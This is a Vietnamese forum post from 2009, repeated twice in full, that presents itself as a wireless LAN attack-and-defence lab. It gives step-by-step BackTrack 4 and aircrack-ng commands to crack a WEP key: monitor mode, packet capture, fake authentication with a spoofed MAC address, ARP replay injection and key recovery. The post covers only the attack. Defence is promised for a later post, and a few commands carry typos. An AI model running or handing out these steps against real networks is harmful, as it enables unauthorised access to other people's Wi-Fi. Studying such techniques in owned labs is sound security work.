caubemetinhoc
26-08-2009, 08:57 PM
LAB TẤN CÔNG VÀ PHÒNG THỦ MẠNG WIRELESS LAN :
http://i346.photobucket.com/albums/p436/cuongit2302/1-5.png
1.Chuẩn bị :
* Phần mềm Backtrack 4 Final
* Card mạng không dây có chipset Atheros hoặc các chipset tương thích với Backtrak 4 Final
* Các máy kết nối theo mô hình trên
2.Các bước thực hiện :
Bước 1 :Cấu hình máy tính với chế độ boot từ CD / DVD
http://i346.photobucket.com/albums/p436/cuongit2302/2-5.png
Bước 2 :Sau khi máy tính boot từ đĩa DVD, giao diện phần mềm BackTrack 4 Final
http://i346.photobucket.com/albums/p436/cuongit2302/3-4.png
Bước 3 :Tại đây các bạn gõ vào : Startx để đăng nhập vào Backtrack
Bước 4 :Muốn sử dụng Backtrack 4 Final để ***** ta phải chuyển card mạng wireless của mình sang chế độ “Monitor”
Bước 5 :Ta dùng lệnh “ iwconfig” để kiểm tra chế độ hiện tại của card mạng wireless
http://i346.photobucket.com/albums/p436/cuongit2302/4-4.png
Bước 6 :Ta dùng lệnh : “ airmon-ng start wlan0” để chuyển card mạng wireless sang chế độ “monitor”
http://i346.photobucket.com/albums/p436/cuongit2302/5-4.png
Bước 7 :Tiến hành dò tìm các AP trong phạm vi ta đặt máy tính có card mạng không dây bằng lệnh : ”airodump-ng wlan0”
http://i346.photobucket.com/albums/p436/cuongit2302/5-4.png
Bước 8 :Hình minh họa trên cho ta thấy tên các AP xung quanh phạm vi đặt máy tính có card mạng không dây của ta
Bước 9 :Sau đây ta sẽ tiến hành quá trình ***** key của AP có SSID : Hack Wireless iSPACE”. Ta cần lưu ý “Channel” của AP này (Channel 6)
Bước 10 :Ta mở Terminal thứ 02 và thực hiện lệnh như sau : “airodump-ng -c 6 –w wep wlan0”
http://i346.photobucket.com/albums/p436/cuongit2302/7-5.png
Bước 11 :Tiến hành quá trình “authenticate” với AP và giả địa chỉ MAC : Ta mở Terminal thứ 03 và thực hiện lệnh : “ aireplay-ng -1 20 –a 00: 1B: 11: 58: 7B: A9 –h 11: 22 : 33: 44: 55: 66 wlan0”
http://i346.photobucket.com/albums/p436/cuongit2302/8-4.png
Bước 12 :Ta tiến hành gởi nhiều gói tin đến AP để làm tăng lượng traffice nhằm làm cho quá trình tìm key nhanh hơn. Mở terminal thứ 4 và thực hiện lệnh : “aireplay–ng -3 –b 00: 1B: 11: 58: 7B: A9 –h 11: 22 : 33: 44: 55: 66 wlan0”
http://i346.photobucket.com/albums/p436/cuongit2302/9-4.png
Bước 13 :Quan sát lượng traffice đã thu thập ở cột “Data”:
http://i346.photobucket.com/albums/p436/cuongit2302/10-4.png
Bước 14 :Mở Terminal 05 và thực hiện lệnh : “aicrack-ng web.01.cap”
http://i346.photobucket.com/albums/p436/cuongit2302/11-1.png
Bước 15 :Quá trình tìm Key thành công :
http://i346.photobucket.com/albums/p436/cuongit2302/12-1.png
Đó là quá trình tìm key của WEP, lần sau mình sẽ post tiếp quá trình tìm key của WAP và cách phòng thủ mạng wireless LAN. Các bạn đón đọc tiếp nhé,
Cám ơn,
__________________
http://i346.photobucket.com/albums/p436/cuongit2302/1-5.png
1.Chuẩn bị :
* Phần mềm Backtrack 4 Final
* Card mạng không dây có chipset Atheros hoặc các chipset tương thích với Backtrak 4 Final
* Các máy kết nối theo mô hình trên
2.Các bước thực hiện :
Bước 1 :Cấu hình máy tính với chế độ boot từ CD / DVD
http://i346.photobucket.com/albums/p436/cuongit2302/2-5.png
Bước 2 :Sau khi máy tính boot từ đĩa DVD, giao diện phần mềm BackTrack 4 Final
http://i346.photobucket.com/albums/p436/cuongit2302/3-4.png
Bước 3 :Tại đây các bạn gõ vào : Startx để đăng nhập vào Backtrack
Bước 4 :Muốn sử dụng Backtrack 4 Final để ***** ta phải chuyển card mạng wireless của mình sang chế độ “Monitor”
Bước 5 :Ta dùng lệnh “ iwconfig” để kiểm tra chế độ hiện tại của card mạng wireless
http://i346.photobucket.com/albums/p436/cuongit2302/4-4.png
Bước 6 :Ta dùng lệnh : “ airmon-ng start wlan0” để chuyển card mạng wireless sang chế độ “monitor”
http://i346.photobucket.com/albums/p436/cuongit2302/5-4.png
Bước 7 :Tiến hành dò tìm các AP trong phạm vi ta đặt máy tính có card mạng không dây bằng lệnh : ”airodump-ng wlan0”
http://i346.photobucket.com/albums/p436/cuongit2302/5-4.png
Bước 8 :Hình minh họa trên cho ta thấy tên các AP xung quanh phạm vi đặt máy tính có card mạng không dây của ta
Bước 9 :Sau đây ta sẽ tiến hành quá trình ***** key của AP có SSID : Hack Wireless iSPACE”. Ta cần lưu ý “Channel” của AP này (Channel 6)
Bước 10 :Ta mở Terminal thứ 02 và thực hiện lệnh như sau : “airodump-ng -c 6 –w wep wlan0”
http://i346.photobucket.com/albums/p436/cuongit2302/7-5.png
Bước 11 :Tiến hành quá trình “authenticate” với AP và giả địa chỉ MAC : Ta mở Terminal thứ 03 và thực hiện lệnh : “ aireplay-ng -1 20 –a 00: 1B: 11: 58: 7B: A9 –h 11: 22 : 33: 44: 55: 66 wlan0”
http://i346.photobucket.com/albums/p436/cuongit2302/8-4.png
Bước 12 :Ta tiến hành gởi nhiều gói tin đến AP để làm tăng lượng traffice nhằm làm cho quá trình tìm key nhanh hơn. Mở terminal thứ 4 và thực hiện lệnh : “aireplay–ng -3 –b 00: 1B: 11: 58: 7B: A9 –h 11: 22 : 33: 44: 55: 66 wlan0”
http://i346.photobucket.com/albums/p436/cuongit2302/9-4.png
Bước 13 :Quan sát lượng traffice đã thu thập ở cột “Data”:
http://i346.photobucket.com/albums/p436/cuongit2302/10-4.png
Bước 14 :Mở Terminal 05 và thực hiện lệnh : “aicrack-ng web.01.cap”
http://i346.photobucket.com/albums/p436/cuongit2302/11-1.png
Bước 15 :Quá trình tìm Key thành công :
http://i346.photobucket.com/albums/p436/cuongit2302/12-1.png
Đó là quá trình tìm key của WEP, lần sau mình sẽ post tiếp quá trình tìm key của WAP và cách phòng thủ mạng wireless LAN. Các bạn đón đọc tiếp nhé,
Cám ơn,
__________________